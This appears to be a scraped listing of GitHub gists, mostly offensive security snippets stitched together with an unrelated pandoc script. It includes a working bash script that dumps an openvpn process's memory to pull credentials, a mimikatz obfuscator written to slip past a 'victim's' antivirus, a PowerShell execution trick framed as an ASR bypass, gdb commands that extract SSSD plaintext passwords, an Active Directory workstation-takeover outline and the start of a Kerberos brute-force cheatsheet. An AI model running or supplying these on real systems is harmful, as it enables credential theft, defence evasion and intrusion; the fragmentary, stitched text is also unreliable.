@pakt
pakt / rdwr.py
Created August 15, 2015 10:59
Direct read/write access to Python's memory
#
# read/write access to python's memory, using a custom bytearray.
# some code taken from: http://tinyurl.com/q7duzxj
#
# tested on:
# Python 2.7.10, ubuntu 32bit
# Python 2.7.8, win32
#
# example of correct output:
# inspecting int=0x41424344, at 0x0228f898
#!/bin/bash
# This little hack-job will grab credentials from a running openvpn process in Linux
# Keep in mind this won't work if the user used the --auth-nocache flag
pid=$(ps -efww | grep -v grep | grep openvpn | awk '{print $2}')
echo $pid | grep rw-p /proc/$pid/maps | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' | while read start stop; do gdb --batch-silent --silent --pid $pid -ex "dump memory $pid-$start-$stop.dump 0x$start 0x$stop"; done
echo "Your credentials should be listed below as username/password"
strings *.dump | awk 'NR>=3 && NR<=4 { print }'
rm *.dump --force
anonymous
anonymous / txt2pdf.sh
Created May 23, 2016 20:28
an easy way to turn formatted text files into PDFs.
#!/bin/bash
# a pandoc script to easily turn formatted text files into PDFs - May 2016.
# based on a script by @pdfkungfoo, minor changes by Ange Albertini
# requires pandoc http://pandoc.org/
# and either XeTeX http://xetex.sourceforge.net/ or LuaTeX http://www.luatex.org/
# Xelatex supports all system fonts by default, and UTF8.
# standard PDFLateX doesn't. LuaLaTex also does but is slower.
@imaibou
imaibou / mimikatz_obfuscator.sh
Last active June 24, 2025 11:18
Mimikatz Obfuscator
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/windows
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'
@bandrel
bandrel / check_hashes.py
Last active November 5, 2024 06:12
To check for and reveal AD user accounts that share passwords using a hashdump from a Domain Controller
#!/usr/bin/env python3
#Purpose: To check for and reveal AD user accounts that share passwords using a hashdump from a Domain Controller
#Script requires a command line argument of a file containing usernames/hashes in the format of user:sid:LMHASH:NTLMHASH:::
# ./check_hashes.py <hash_dump>
import argparse
import re
parser = argparse.ArgumentParser(description="Check user hashes against each other to find users that share passwords")
@monoxgas
monoxgas / shortcut.ps1
Last active May 29, 2020 14:49
Execute something under svchost.exe using shortcut hotkeys (ASR bypass?)
$Shell = New-Object -Com WScript.Shell
$S = $Shell.CreateShortcut("$($Env:AppData)\Microsoft\Windows\Start Menu\default.lnk")
$S.TargetPath = "calc.exe"
$S.Hotkey = "Ctrl+U"
$S.Save()
$Shell.SendKeys("^u")
Start-Sleep 10;rm "$($Env:AppData)\Microsoft\Windows\Start Menu\default.lnk"
@jthuraisamy
jthuraisamy / loaded_psp_drivers.cpp
Last active June 19, 2025 17:45
Loaded Security Product Drivers
#include <Windows.h>
#include <ImageHlp.h>
#include <strsafe.h>
#include "loaded_psp_drivers.h"
#include <set>
#include <string>
#include <algorithm>
#pragma comment(lib, "crypt32.lib")
@gladiatx0r
gladiatx0r / gist:c52d529ea268f7e74295c2c492cf9774
Created October 6, 2020 21:05 — forked from jeffmcjunkin/gist:d5fb8dbf15cbd5d37a77fafccda4d969
Retrieving SSSD plain text passwords (krb5_store_password_if_offline)
For whoever this interests: if you enable krb5_store_password_if_offline in the SSSD configuration, the AD password for accounts is stored in plaintext in the kernel keyring.
To dump the clear text password you can do:
```
gdb -p <PID_OF_SSSD>
call system("keyctl show > /tmp/output")
```
From /tmp/output, locate the key_id for the user you want.
An example of the output is:
@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active August 25, 2025 14:06
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. In short, this is accomplished by:

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@gladiatx0r
gladiatx0r / kerberos_attacks_cheatsheet.md
Created September 18, 2021 02:04 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform Kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module: